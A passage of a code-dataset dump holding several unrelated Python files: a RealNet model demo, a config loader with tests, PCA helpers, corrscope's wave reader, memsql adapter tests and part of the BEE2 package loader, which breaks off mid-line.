xtils\n\n torch.manual_seed(9528)\n\n # # imagenet\n # exp = {'stages': 4, 'rock': 'Q', 'branch': 3, 'indepth': 5, 'growth': 3, 'multiway': 4,\n # 'layers': (6, 5, 4, 3), 'blocks': ('D', 'D', 'D', 'S'), 'classify': (1, 1, 1, 1),\n # 'trans': ('A', 'A', 'A', 'A'), 'reduction': (0.5, 0.5, 0.5, 0.5), 'convkp': ('T', 'T', 'T', 'O'),\n # 'last_branch': 2, 'last_down': False, 'last_expand': 10, 'inmode': 'nearest',\n # 'poolmode': 'avg', 'active': 'relu', 'summer': 'merge', 'nclass': 1000}\n #\n # model = RealNet(**exp)\n # print(model)\n # x = torch.randn(4, 3, 256, 256)\n # # utils.tensorboard_add_model(model, x)\n # utils.calculate_params_scale(model, format='million')\n # utils.calculate_layers_num(model, layers=('conv2d', 'deconv2d', 'fc'))\n # y = model(x)\n # print('共有dense blocks数:', sum(model.layers), '最后实际输出分类头数:', len(y),)\n # print('每个输出预测的尺寸:', [(yy.shape,) for yy in y if yy is not None])\n # print('每个输出预测的得分:', [(yy.max(1),) for yy in y if yy is not None])\n\n # cifar\n exp2 = {'stages': 2, 'rock': 'O', 'branch': 3, 'indepth': 24, 'growth': 12, 'multiway': 4,\n 'layers': (7, 1, 0), 'blocks': ('D', 'D', '-'), 'classify': (0, 0, 0),\n 'trans': ('A', 'A', '-'), 'reduction': (0.5, 0, 0), 'convkp': ('T', 'T', 'T', 'O'),\n 'last_branch': 1, 'last_down': True, 'last_expand': 0, 'inmode': 'nearest',\n 'poolmode': 'avg', 'active': 'relu', 'summer': 'split', 'nclass': 10}\n\n exp3 = {'stages': 3, 'rock': 'O', 'branch': 3, 'indepth': 24, 'growth': 12, 'multiway': 4,\n 'layers': (4, 3, 2), 'blocks': ('D', 'D', 'D'), 'classify': (1, 1, 1),\n 'trans': ('A', 'A', 'A'), 'reduction': (0.5, 0.5, 0), 'convkp': ('T', 'T', 'T', 'T'),\n 'last_branch': 1, 'last_down': False, 'last_expand': 10, 'inmode': 'nearest',\n 'poolmode': 'avg', 'active': 'relu', 'summer': 'split', 'nclass': 10}\n\n model = RealNet(**exp3)\n print(model)\n x = torch.randn(4, 3, 32, 32)\n # utils.tensorboard_add_model(model, x)\n xtils.calculate_params_scale(model, format='million')\n xtils.calculate_layers_num(model, layers=('conv2d', 'deconv2d', 'fc'))\n y = model(x)\n print('共有dense blocks数:', sum(model.layers), '最后实际输出分类头数:', len(y), )\n print('每个输出预测的尺寸:', [(yy.shape,) for yy in y if yy is not None])\n print('每个输出预测的得分:', [(yy.max(1),) for yy in y if yy is not None])\n\n","sub_path":"xmodels/realnet.py","file_name":"realnet.py","file_ext":"py","file_size_in_byte":21669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"611092004","text":"# Created by aviade \n# Time: 09/05/2016 17:31\n\n__author__ = 'dana'\nimport configparser\nimport sys\nimport logging\nfrom commons.commons import * #common and builtin functions can be used in config values\n__config =None\n__config_file = None\n\ndef getConfig():\n \"\"\"\n @description: config file given as the first commnand line param.\n :return: config instance\n \"\"\"\n global __config, __config_file\n if __config and __config_file==sys.argv[1]:\n return __config\n else:\n try:\n __config_file = sys.argv[1]\n logging.info(\"config file %s\"%__config_file)\n __config = configparser.ConfigParser()\n __config.read(__config_file, encoding=\"utf8\")\n __config.eval = lambda sec,key: eval(__config.get(sec,key))\n __config.getfilename = lambda: __config_file\n return __config\n except:\n logging.exception( \"Usage: %s \" , (sys.argv[0]))\n exit(-1)\n\n\n\n########################################################################\nimport unittest\nclass TestConfig(unittest.TestCase):\n def setUp(self):\n import sys;sys.argv = [sys.argv[0], 'config_test_offline.ini']\n self._config= getConfig()\n\n def tearDown(self):\n pass\n\n def testDefaultValue(self):\n self.assertEqual(self._config.get(\"DB\",\"start_date\"), \"date('2015-04-01 00:00:00')\")\n\n def testAccessDefault(self):\n self.assertEqual(self._config.get(\"DEFAULT\",\"start_date\"), \"date('2015-04-01 00:00:00')\")\n\n def testEval(self):\n import datetime\n self.assertEqual(self._config.eval(\"DEFAULT\",\"start_date\"), datetime.datetime.strptime('2015-04-01 00:00:00',\"%Y-%m-%d %H:%M:%S\"))\n\nif __name__ == \"__main__\":\n unittest.main()\n\n","sub_path":"configuration/config_class.py","file_name":"config_class.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"633404219","text":"import torch\n\ndef get_covariance_matrix(X):\n '''\n Returns the covariance of the data X\n X should contain a single data point per row of the tensor\n '''\n X_mean = torch.mean(X, dim=0)\n X_mean_matrix = torch.outer(X_mean, X_mean)\n X_corr_matrix = torch.matmul(torch.transpose(X, 0, 1), X)/X.size(0)\n cov = X_corr_matrix - X_mean_matrix\n return cov\n\ndef get_e_v(cov):\n '''\n Returns eigenvalues and eigenvectors in descending order by eigenvalue size\n '''\n e, v = torch.symeig(cov, eigenvectors=True)\n v = torch.transpose(v, 0, 1)\n e_abs = torch.abs(e)\n\n inds = torch.argsort(e_abs, descending=True)\n e = e_abs[inds]\n v = v[inds]\n\n return e,v\n","sub_path":"pca_tools.py","file_name":"pca_tools.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"200785851","text":"import copy\nimport enum\nimport warnings\nfrom enum import auto\nfrom typing import Union, List\n\nimport numpy as np\n\nimport corrscope.utils.scipy.wavfile as wavfile\nfrom corrscope.config import CorrError, CorrWarning, TypedEnumDump\n\nFLOAT = np.single\n\n\n@enum.unique\nclass Flatten(TypedEnumDump):\n \"\"\" How to flatten a stereo signal. (Channels beyond first 2 are ignored.)\n\n Flatten(0) == Flatten.Stereo == Flatten['Stereo']\n \"\"\"\n\n # Keep both channels.\n Stereo = 0\n\n # Mono\n Mono = auto() # NOT publicly exposed\n\n # Take sum or difference.\n SumAvg = auto()\n DiffAvg = auto()\n\n modes: List[\"Flatten\"]\n\n\n_rejected_modes = {Flatten.Mono}\nFlatten.modes = [f for f in Flatten.__members__.values() if f not in _rejected_modes]\n\n\nclass Wave:\n __slots__ = \"\"\"\n wave_path\n amplification\n smp_s data return_channels _flatten is_mono\n nsamp dtype\n center max_val\n \"\"\".split()\n\n smp_s: int\n data: \"np.ndarray\"\n \"\"\"2-D array of shape (nsamp, nchan)\"\"\"\n\n _flatten: Flatten\n\n @property\n def flatten(self) -> Flatten:\n \"\"\"\n If data is stereo:\n - flatten can be Stereo (2D) or Sum/Diff(Avg) (1D).\n\n If data is mono:\n - flatten can be Stereo (2D) or Mono (1D).\n - If flatten != Stereo, set flatten = Mono.\n \"\"\"\n return self._flatten\n\n @flatten.setter\n def flatten(self, flatten: Flatten) -> None:\n # Reject invalid modes (including Mono).\n if flatten not in Flatten.modes: # type: ignore\n # Flatten.Mono not in Flatten.modes.\n raise CorrError(\n f\"Wave {self.wave_path} has invalid flatten mode {flatten} \"\n f\"not in {Flatten.modes}\"\n )\n\n # If self.is_mono, converts all non-Stereo modes to Mono.\n self._flatten = flatten\n if self.is_mono and flatten != Flatten.Stereo:\n self._flatten = Flatten.Mono\n\n def __init__(\n self,\n wave_path: str,\n amplification: float = 1.0,\n flatten: Flatten = Flatten.SumAvg,\n ):\n self.wave_path = wave_path\n self.amplification = amplification\n self.smp_s, self.data = wavfile.read(wave_path, mmap=True)\n\n assert self.data.ndim in [1, 2]\n self.is_mono = self.data.ndim == 1\n self.flatten = flatten\n self.return_channels = False\n\n # Cast self.data to stereo (nsamp, nchan)\n if self.is_mono:\n self.data.shape = (-1, 1)\n\n self.nsamp, stereo_nchan = self.data.shape\n if stereo_nchan > 2:\n warnings.warn(\n f\"File {wave_path} has {stereo_nchan} channels, \"\n f\"only first 2 will be used\",\n CorrWarning,\n )\n\n dtype = self.data.dtype\n\n # Calculate scaling factor.\n def is_type(parent: type) -> bool:\n return np.issubdtype(dtype, parent)\n\n # Numpy types: https://docs.scipy.org/doc/numpy/reference/arrays.scalars.html\n if is_type(np.integer):\n max_int = np.iinfo(dtype).max + 1\n assert max_int & (max_int - 1) == 0 # power of 2\n\n if is_type(np.unsignedinteger):\n self.center = max_int // 2\n self.max_val = max_int // 2\n\n elif is_type(np.signedinteger):\n self.center = 0\n self.max_val = max_int\n\n elif is_type(np.floating):\n self.center = 0\n self.max_val = 1\n\n else:\n raise CorrError(f\"unexpected wavfile dtype {dtype}\")\n\n def with_flatten(self, flatten: Flatten, return_channels: bool) -> \"Wave\":\n new = copy.copy(self)\n new.flatten = flatten\n new.return_channels = return_channels\n return new\n\n def __getitem__(self, index: Union[int, slice]) -> np.ndarray:\n \"\"\" Copies self.data[item], converted to a FLOAT within range [-1, 1). \"\"\"\n # subok=False converts data from memmap (slow) to ndarray (faster).\n data: np.ndarray = self.data[index].astype(FLOAT, subok=False, copy=True)\n\n # Flatten stereo to mono.\n flatten = self._flatten # Potentially faster than property getter.\n if flatten == Flatten.Mono:\n data = data.reshape(-1) # ndarray.flatten() creates copy, is slow.\n elif flatten != Flatten.Stereo:\n # data.strides = (4,), so data == contiguous float32\n if flatten == Flatten.SumAvg:\n data = data[..., 0] + data[..., 1]\n else:\n data = data[..., 0] - data[..., 1]\n data /= 2\n\n data -= self.center\n data *= self.amplification / self.max_val\n\n if self.return_channels and len(data.shape) == 1:\n data = data.reshape(-1, 1)\n return data\n\n def _get(self, begin: int, end: int, subsampling: int) -> np.ndarray:\n \"\"\" Copies self.data[begin:end] with zero-padding. \"\"\"\n if 0 <= begin and end <= self.nsamp:\n return self[begin:end:subsampling]\n\n region_len = end - begin\n\n def constrain(idx: int) -> int:\n delta = 0\n if idx < 0:\n delta = 0 - idx # delta > 0\n assert idx + delta == 0\n\n if idx > self.nsamp:\n delta = self.nsamp - idx # delta < 0\n assert idx + delta == self.nsamp\n\n return delta\n\n begin_index = constrain(begin)\n end_index = region_len + constrain(end)\n del end\n data = self[begin + begin_index : begin + end_index : subsampling]\n\n # Compute subsampled output ranges\n out_len = region_len // subsampling\n out_begin = begin_index // subsampling\n out_end = out_begin + len(data)\n # len(data) == ceil((end_index - begin_index) / subsampling)\n\n out = np.zeros((out_len, *data.shape[1:]), dtype=FLOAT)\n\n out[out_begin:out_end] = data\n\n return out\n\n def get_around(self, sample: int, return_nsamp: int, stride: int) -> np.ndarray:\n \"\"\" Returns `return_nsamp` samples, centered around `sample`,\n sampled with spacing `stride`.\n\n Copies self.data[...] \"\"\"\n distance = return_nsamp * stride\n end = sample + distance // 2\n begin = end - distance\n return self._get(begin, end, stride)\n\n def get_s(self) -> float:\n \"\"\"\n :return: time (seconds)\n \"\"\"\n return self.nsamp / self.smp_s\n","sub_path":"corrscope/wave.py","file_name":"wave.py","file_ext":"py","file_size_in_byte":6432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"640249007","text":"import pytest\nfrom memsql.common import database\n\ndef test_connection_open(test_db_conn):\n assert test_db_conn.connected()\n\ndef test_connection_close(test_db_conn):\n assert test_db_conn.connected()\n test_db_conn.close()\n assert not test_db_conn.connected()\n\ndef test_reconnect(test_db_conn):\n assert test_db_conn.connected()\n db_instance = test_db_conn._db\n test_db_conn.reconnect()\n assert test_db_conn.connected()\n assert db_instance != test_db_conn._db\n\ndef test_query(test_db_conn):\n # select result\n res = test_db_conn.query('select 1')\n assert len(res) == 1\n assert res[0]['1'] == 1\n\ndef test_ping(test_db_conn):\n test_db_conn.ping()\n\nclass TestQueries(object):\n @pytest.fixture(scope=\"class\")\n def x_conn(self, request, test_db_args, test_db_database):\n conn = database.connect(**test_db_args)\n conn.execute('CREATE DATABASE IF NOT EXISTS %s' % test_db_database)\n conn.execute('USE %s' % test_db_database)\n\n def cleanup():\n conn.execute('DROP DATABASE %s' % test_db_database)\n request.addfinalizer(cleanup)\n\n return conn\n\n @pytest.fixture(scope=\"class\", autouse=True)\n def ensure_schema(self, x_conn, request):\n x_conn.execute('DROP TABLE IF EXISTS x')\n x_conn.execute('CREATE TABLE x (id BIGINT AUTO_INCREMENT PRIMARY KEY, value INT)')\n\n @pytest.fixture(autouse=True)\n def ensure_empty(self, x_conn, request):\n cleanup = lambda: x_conn.execute('DELETE FROM x')\n cleanup()\n request.addfinalizer(cleanup)\n\n def test_insert(self, x_conn):\n res = x_conn.query('INSERT INTO x (value) VALUES(1)')\n assert isinstance(res, long)\n assert res == 1 # 1 affected row\n\n res = x_conn.execute('INSERT INTO x (value) VALUES(1)')\n assert isinstance(res, long)\n\n res = x_conn.execute_lastrowid('INSERT INTO x (value) VALUES(1)')\n assert isinstance(res, long)\n last_row = x_conn.get('SELECT * FROM x ORDER BY id DESC LIMIT 1')\n assert res == last_row.id\n\n def test_select(self, x_conn):\n x_conn.execute('INSERT INTO x (value) VALUES (1), (2), (3)')\n\n all_rows = x_conn.query('SELECT * FROM x ORDER BY value ASC')\n assert len(all_rows) == 3\n assert all_rows[1].value == 2\n\n first_row = x_conn.get('SELECT * FROM x ORDER BY id LIMIT 1')\n assert first_row.value == 1\n\n def test_queryparams(self, x_conn):\n x_conn.execute('INSERT INTO x (value) VALUES (1), (2), (3)')\n\n rows = x_conn.query('SELECT * FROM x WHERE value > %s AND value < %s', 1, 3)\n\n assert len(rows) == 1\n assert rows[0].value == 2\n","sub_path":"memsql/common/test/test_database_adapters.py","file_name":"test_database_adapters.py","file_ext":"py","file_size_in_byte":2674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"499530519","text":"\"\"\"\nHandles scanning through the zip packages to find all items, styles, etc.\n\"\"\"\nfrom __future__ import annotations\nimport os\nfrom collections import defaultdict\nimport attr\n\nimport srctools\nfrom app import tkMarkdown, img\nimport utils\nimport consts\nfrom app.packageMan import PACK_CONFIG\nfrom srctools import Property, NoKeyError\nfrom srctools.tokenizer import TokenSyntaxError\nfrom srctools.filesys import FileSystem, RawFileSystem, ZipFileSystem, VPKFileSystem\nfrom editoritems import Item as EditorItem, Renderable, RenderableType\nimport srctools.logger\n\nfrom typing import (\n NoReturn, ClassVar, Optional, Any, TYPE_CHECKING, TypeVar, Type,\n Collection, Iterable, Mapping,\n)\nif TYPE_CHECKING: # Prevent circular import\n from app.gameMan import Game\n from loadScreen import LoadScreen\n\n\nLOGGER = srctools.logger.get_logger(__name__, alias='packages')\n\nall_obj: dict[Type[PakObject], dict[str, ObjData]] = {}\npackages: dict[str, Package] = {}\nOBJ_TYPES: dict[str, Type[PakObject]] = {}\n\n# Maps a package ID to the matching filesystem for reading files easily.\nPACKAGE_SYS: dict[str, FileSystem] = {}\n\n\n@attr.define\nclass SelitemData:\n \"\"\"Options which are displayed on the selector window.\"\"\"\n name: str # Longer full name.\n short_name: str # Shorter name for the icon.\n auth: list[str] # List of authors.\n icon: Optional[img.Handle] # Small square icon.\n large_icon: Optional[img.Handle] # Larger, landscape icon.\n desc: tkMarkdown.MarkdownData\n group: Optional[str]\n sort_key: str\n\n @classmethod\n def parse(cls, info: Property, pack_id: str) -> SelitemData:\n \"\"\"Parse from a property block.\"\"\"\n auth = sep_values(info['authors', ''])\n short_name = info['shortName', None]\n name = info['name']\n group = info['group', '']\n sort_key = info['sort_key', '']\n desc = desc_parse(info, info['id'], pack_id)\n if not group:\n group = None\n if not short_name:\n short_name = name\n\n try:\n icon = img.Handle.parse(\n info.find_key('icon'),\n pack_id,\n consts.SEL_ICON_SIZE, consts.SEL_ICON_SIZE,\n )\n except LookupError:\n icon = None\n try:\n large_icon = img.Handle.parse(\n info.find_key('iconlarge'),\n pack_id,\n *consts.SEL_ICON_SIZE_LRG,\n )\n except LookupError:\n large_icon = None\n\n return cls(\n name,\n short_name,\n auth,\n icon,\n large_icon,\n desc,\n group,\n sort_key,\n )\n\n def __add__(self, other: SelitemData) -> SelitemData:\n \"\"\"Join together two sets of selitem data.\n\n This uses the over_data values if defined, using our_data if not.\n Authors and descriptions will be joined to each other.\n \"\"\"\n if not isinstance(other, SelitemData):\n return NotImplemented\n\n return SelitemData(\n self.name,\n self.short_name,\n self.auth + other.auth,\n other.icon or self.icon,\n other.large_icon or self.large_icon,\n tkMarkdown.join(self.desc, other.desc),\n other.group or self.group,\n other.sort_key or self.sort_key,\n )\n\n\n@attr.define\nclass ObjData:\n \"\"\"Temporary data stored when parsing info.txt, but before .parse() is called.\n\n This allows us to parse all packages before loading objects.\n \"\"\"\n fsys: FileSystem\n info_block: Property\n pak_id: str\n disp_name: str\n\n\n@attr.define\nclass ParseData:\n \"\"\"The arguments for pak_object.parse().\"\"\"\n fsys: FileSystem\n id: str\n info: Property\n pak_id: str\n is_override: bool\n\n\n@attr.define\nclass ExportData:\n \"\"\"The arguments to pak_object.export().\"\"\"\n # Usually str, but some items pass other things.\n selected: Any\n # Some items need to know which style is selected\n selected_style: Style\n all_items: list[EditorItem] # All the items in the map\n renderables: dict[RenderableType, Renderable] # The error/connection icons\n vbsp_conf: Property\n game: Game\n\n\n@attr.define\nclass CorrDesc:\n \"\"\"Name, description and icon for each corridor in a style.\"\"\"\n name: str = ''\n icon: utils.PackagePath = img.PATH_BLANK\n desc: str = ''\n\n\n# Corridor type to size.\nCORRIDOR_COUNTS = {\n 'sp_entry': 7,\n 'sp_exit': 4,\n 'coop': 4,\n}\n\n# This package contains necessary components, and must be available.\nCLEAN_PACKAGE = 'BEE2_CLEAN_STYLE'.casefold()\n\n# Check to see if the zip contains the resources referred to by the packfile.\nCHECK_PACKFILE_CORRECTNESS = False\n\nVPK_OVERRIDE_README = \"\"\"\\\nFiles in this folder will be written to the VPK during every BEE2 export.\nUse to override resources as you please.\n\"\"\"\n\n\n# The folder we want to copy our VPKs to.\nVPK_FOLDER = {\n # The last DLC released by Valve - this is the one that we\n # overwrite with a VPK file.\n utils.STEAM_IDS['PORTAL2']: 'portal2_dlc3',\n utils.STEAM_IDS['DEST_AP']: 'portal2_dlc3',\n\n # This doesn't have VPK files, and is higher priority.\n utils.STEAM_IDS['APERTURE TAG']: 'portal2',\n}\n\n\nclass NoVPKExport(Exception):\n \"\"\"Raised to indicate that VPK files weren't copied.\"\"\"\n\n\nT = TypeVar('T')\nPakT = TypeVar('PakT', bound='PakObject')\n\n\nclass PakObject:\n \"\"\"PackObject(allow_mult=False, has_img=True): The base class for package objects.\n\n In the class base list, set 'allow_mult' to True if duplicates are allowed.\n If duplicates occur, they will be treated as overrides.\n Set 'has_img' to control whether the object will count towards the images\n loading bar - this should be stepped in the UI.load_packages() method.\n \"\"\"\n # ID of the object\n id: str\n # ID of the package.\n pak_id: str\n # Display name of the package.\n pak_name: str\n\n _id_to_obj: ClassVar[dict[str, PakObject]]\n allow_mult: ClassVar[bool]\n\n def __init_subclass__(\n cls,\n allow_mult: bool = False,\n **kwargs,\n ) -> None:\n super().__init_subclass__(**kwargs)\n OBJ_TYPES[cls.__name__.casefold()] = cls\n\n # Maps object IDs to the object.\n cls._id_to_obj = {}\n cls.allow_mult = allow_mult\n\n @classmethod\n def parse(cls: Type[PakT], data: ParseData) -> PakT:\n \"\"\"Parse the package object from the info.txt block.\n\n ParseData is a namedtuple containing relevant info:\n - fsys, the package's FileSystem\n - id, the ID of the item\n - info, the Property block in info.txt\n - pak_id, the ID of the package\n \"\"\"\n raise NotImplementedError\n\n def add_over(self: PakT, override: PakT):\n \"\"\"Called to override values.\n self is the originally defined item, and override is the override item\n to copy values from.\n \"\"\"\n pass\n\n @staticmethod\n def export(exp_data: ExportData) -> None:\n \"\"\"Export the appropriate data into the game.\n\n ExportData is a namedtuple containing various data:\n - selected: The ID of the selected item (or None)\n - selected_style: The selected style object\n - editoritems: The Property block for editoritems.txt\n - vbsp_conf: The Property block for vbsp_config\n - game: The game we're exporting to.\n \"\"\"\n raise NotImplementedError\n\n @classmethod\n def post_parse(cls) -> None:\n \"\"\"Do processing after all objects have been fully parsed.\"\"\"\n pass\n\n @classmethod\n def all(cls: Type[PakT]) -> Collection[PakT]:\n \"\"\"Get the list of objects parsed.\"\"\"\n return cls._id_to_obj.values()\n\n @classmethod\n def by_id(cls: Type[PakT], object_id: str) -> PakT:\n \"\"\"Return the object with a given ID.\"\"\"\n return cls._id_to_obj[object_id.casefold()]\n\n\ndef reraise_keyerror(err: BaseException, obj_id: str) -> NoReturn:\n \"\"\"Replace NoKeyErrors with a nicer one, giving the item that failed.\"\"\"\n if isinstance(err, IndexError):\n if isinstance(err.__cause__, NoKeyError):\n # Property.__getitem__ raises IndexError from\n # NoKeyError, so read from the original\n key_error = err.__cause__\n else:\n # We shouldn't have caught this\n raise err\n else:\n key_error = err\n raise Exception(\n 'No \"{key}\" in {id!s} object!'.format(\n key=key_error.key,\n id=obj_id,\n )\n ) from err\n\n\ndef get_config(\n prop_block: Property,\n fsys: FileSystem,\n folder: str,\n pak_id='',\n prop_name='config',\n extension='.cfg',\n ):\n \"\"\"Extract a config file referred to by the given property block.\n\n Looks for the prop_name key in the given prop_block.\n If the keyvalue has a value of \"\", an empty tree is returned.\n If it has children, a copy of them is returned.\n Otherwise the value is a filename in the zip which will be parsed.\n \"\"\"\n prop_block = prop_block.find_key(prop_name, \"\")\n if prop_block.has_children():\n prop = prop_block.copy()\n prop.name = None\n return prop\n\n if prop_block.value == '':\n return Property(None, [])\n\n # Zips must use '/' for the separator, even on Windows!\n path = folder + '/' + prop_block.value\n if len(path) < 3 or path[-4] != '.':\n # Add extension\n path += extension\n try:\n return fsys.read_prop(path)\n except FileNotFoundError:\n LOGGER.warning('\"{id}:{path}\" not in zip!', id=pak_id, path=path)\n return Property(None, [])\n except UnicodeDecodeError:\n LOGGER.exception('Unable to read \"{id}:{path}\"', id=pak_id, path=path)\n raise\n\n\ndef set_cond_source(props: Property, source: str) -> None:\n \"\"\"Set metadata for Conditions in the given config blocks.\n\n This generates '__src__' keyvalues in Condition blocks with info like\n the source object ID and originating file, so errors can be traced back\n to the config file creating it.\n \"\"\"\n for cond in props.find_all('Conditions', 'Condition'):\n cond['__src__'] = source\n\n\ndef find_packages(pak_dir: str) -> None:\n \"\"\"Search a folder for packages, recursing if necessary.\"\"\"\n found_pak = False\n for name in os.listdir(pak_dir): # Both files and dirs\n name = os.path.join(pak_dir, name)\n folded = name.casefold()\n if folded.endswith('.vpk') and not folded.endswith('_dir.vpk'):\n # _000.vpk files, useless without the directory\n continue\n\n if os.path.isdir(name):\n filesys = RawFileSystem(name)\n else:\n ext = os.path.splitext(folded)[1]\n if ext in ('.bee_pack', '.zip'):\n filesys = ZipFileSystem(name)\n elif ext == '.vpk':\n filesys = VPKFileSystem(name)\n else:\n LOGGER.info('Extra file: {}', name)\n continue\n\n LOGGER.debug('Reading package \"' + name + '\"')\n\n # Gain a persistent hold on the filesystem's handle.\n # That means we don't need to reopen the zip files constantly.\n filesys.open_ref()\n\n # Valid packages must have an info.txt file!\n try:\n info = filesys.read_prop('info.txt')\n except FileNotFoundError:\n # Close the ref we've gotten, since it's not in the dict\n # it won't be done by load_packages().\n filesys.close_ref()\n\n if os.path.isdir(name):\n # This isn't a package, so check the subfolders too...\n LOGGER.debug('Checking subdir \"{}\" for packages...', name)\n find_packages(name)\n else:\n LOGGER.warning('ERROR: package \"{}\" has no info.txt!', name)\n # Don't continue to parse this \"package\"\n continue\n try:\n pak_id = info['ID']\n except IndexError:\n # Close the ref we've gotten, since it's not in the dict\n # it won't be done by load_packages().\n filesys.close_ref()\n raise\n\n if pak_id.casefold() in packages:\n raise ValueError(\n f'Duplicate package with id \"{pak_id}\"!\\n'\n 'If you just updated the mod, delete any old files in packages/.'\n ) from None\n\n PACKAGE_SYS[pak_id.casefold()] = filesys\n\n packages[pak_id.casefold()] = Package(\n pak_id,\n filesys,\n info,\n name,\n )\n found_pak = True\n\n if not found_pak:\n LOGGER.info('No packages in folder {}!', pak_dir)\n\n\ndef no_packages_err(pak_dir: str, msg: str) -> NoReturn:\n \"\"\"Show an error message indicating no packages are present.\"\"\"\n from tkinter import messagebox\n import sys\n # We don't have a packages directory!\n messagebox.showerror(\n title='BEE2 - Invalid Packages Directory!',\n message=(\n '{}\\nGet the packages from '\n '\"https://github.com/BEEmod/BEE2-items\" '\n 'and place them in \"{}\".').format(msg, pak_dir + os.path.sep),\n # Add slash to the end to indicate it's a folder.\n )\n sys.exit()\n\n\ndef load_packages(\n pak_dir: str,\n loader: LoadScreen,\n log_item_fallbacks=False,\n log_missing_styles=False,\n log_missing_ent_count=False,\n log_incorrect_packfile=False,\n has_mel_music=False,\n has_tag_music=False,\n) -> Mapping[str, FileSystem]:\n \"\"\"Scan and read in all packages.\"\"\"\n global CHECK_PACKFILE_CORRECTNESS\n pak_dir = os.path.abspath(pak_dir)\n\n if not os.path.isdir(pak_dir):\n no_packages_err(pak_dir, 'The given packages directory is not present!')\n\n Item.log_ent_count = log_missing_ent_count\n CHECK_PACKFILE_CORRECTNESS = log_incorrect_packfile\n\n # If we fail we want to clean up our filesystems.\n should_close_filesystems = True\n try:\n find_packages(pak_dir)\n\n pack_count = len(packages)\n loader.set_length(\"PAK\", pack_count)\n\n if pack_count == 0:\n no_packages_err(pak_dir, 'No packages found!')\n\n # We must have the clean style package.\n if CLEAN_PACKAGE not in packages:\n no_packages_err(\n pak_dir,\n 'No Clean Style package! This is required for some '\n 'essential resources and objects.'\n )\n\n data: dict[Type[PakT], list[PakT]] = {}\n obj_override: dict[Type[PakObject], dict[str, list[ParseData]]] = {}\n\n for obj_type in OBJ_TYPES.values():\n all_obj[obj_type] = {}\n obj_override[obj_type] = defaultdict(list)\n data[obj_type] = []\n\n for pack in packages.values():\n if not pack.enabled:\n LOGGER.info('Package {id} disabled!', id=pack.id)\n pack_count -= 1\n loader.set_length(\"PAK\", pack_count)\n continue\n\n with srctools.logger.context(pack.id):\n parse_package(pack, obj_override, has_tag_music, has_mel_music)\n loader.step(\"PAK\")\n\n loader.set_length(\"OBJ\", sum(\n len(obj_type)\n for obj_type in\n all_obj.values()\n ))\n\n for obj_class, objs in all_obj.items():\n for obj_id, obj_data in objs.items():\n # parse through the object and return the resultant class\n try:\n with srctools.logger.context(f'{obj_data.pak_id}:{obj_id}'):\n object_ = obj_class.parse(\n ParseData(\n obj_data.fsys,\n obj_id,\n obj_data.info_block,\n obj_data.pak_id,\n False,\n )\n )\n except (NoKeyError, IndexError) as e:\n reraise_keyerror(e, obj_id)\n raise # Never reached.\n except TokenSyntaxError as e:\n # Add the relevant package to the filename.\n if e.file:\n e.file = f'{obj_data.pak_id}:{e.file}'\n raise\n except Exception as e:\n raise ValueError(\n 'Error occured parsing '\n f'{obj_data.pak_id}:{obj_id} item!'\n ) from e\n\n if not hasattr(object_, 'id'):\n raise ValueError(\n '\"{}\" object {} has no ID!'.format(obj_class.__name__, object_)\n )\n\n # Store in this database so we can find all objects for each type.\n # noinspection PyProtectedMember\n obj_class._id_to_obj[object_.id.casefold()] = object_\n\n object_.pak_id = obj_data.pak_id\n object_.pak_name = obj_data.disp_name\n for override_data in obj_override[obj_class].get(obj_id, []):\n try:\n with srctools.logger.context(f'override {override_data.pak_id}:{obj_id}'):\n override = obj_class.parse(override_data)\n except (NoKeyError, IndexError) as e:\n reraise_keyerror(e, f'{override_data.pak_id}:{obj_id}')\n raise # Never reached.\n except TokenSyntaxError as e:\n # Add the relevant package to the filename.\n if e.file:\n e.file = f'{override_data.pak_id}:{e.file}'\n raise\n except Exception as e:\n raise ValueError(\n f'Error occured parsing {obj_id} override'\n f'from package {override_data.pak_id}!'\n ) from e\n\n object_.add_over(override)\n data[obj_class].append(object_)\n loader.step(\"OBJ\")\n\n should_close_filesystems = False\n finally:\n if should_close_filesystems:\n for sys in PACKAGE_SYS.values():\n sys.close_ref()\n\n LOGGER.info('Object counts:\\n{}\\n', '\\n'.join(\n '{:<15}: {}'.format(obj_type.__name__, len(objs))\n for obj_type, objs in\n data.items()\n ))\n\n for obj_type in OBJ_TYPES.values():\n LOGGER.info('Post-process {} objects...', obj_type.__name__)\n obj_type.post_parse()\n\n # This has to be done after styles.\n LOGGER.info('Allocating styled items...')\n assign_styled_items(\n log_item_fallbacks,\n log_missing_styles,\n )\n return PACKAGE_SYS\n\n\ndef parse_package(\n pack: Package,\n obj_override: dict[Type[PakObject], dict[str, list[ParseData]]],\n has_tag: bool=False,\n has_mel: bool=False,\n) -> None:\n \"\"\"Parse through the given package to find all the components.\"\"\"\n from packages import template_brush # Avoid circular imports\n for pre in pack.info.find_children('Prerequisites'):\n # Special case - disable these packages when the music isn't copied.\n if pre.value == '':\n if not has_tag:\n return\n elif pre.value == '':\n if not has_mel:\n return\n elif pre.value.casefold() not in packages:\n LOGGER.warning(\n 'Package \"{pre}\" required for \"{id}\" - '\n 'ignoring package!',\n pre=pre.value,\n id=pack.id,\n )\n return\n\n for obj in pack.info:\n if obj.name in ('prerequisites', 'id', 'name', 'desc'):\n # Not object IDs.\n continue\n if obj.name in ('templatebrush', 'brushtemplate'):\n LOGGER.warning(\n 'TemplateBrush {} no longer needs to be defined in info.txt',\n obj['id', ''],\n )\n continue\n if obj.name == 'overrides':\n for over_prop in obj:\n if over_prop.name in ('templatebrush', 'brushtemplate'):\n LOGGER.warning(\n 'TemplateBrush {} no longer needs to be defined in info.txt',\n over_prop['id', ''],\n )\n continue\n try:\n obj_type = OBJ_TYPES[over_prop.name]\n except KeyError:\n LOGGER.warning('Unknown object type \"{}\" with ID \"{}\"!', over_prop.real_name, over_prop['id', ''])\n continue\n try:\n obj_id = over_prop['id']\n except LookupError:\n raise ValueError('No ID for \"{}\" object type!'.format(obj_type)) from None\n obj_override[obj_type][obj_id].append(\n ParseData(pack.fsys, obj_id, over_prop, pack.id, True)\n )\n else:\n try:\n obj_type = 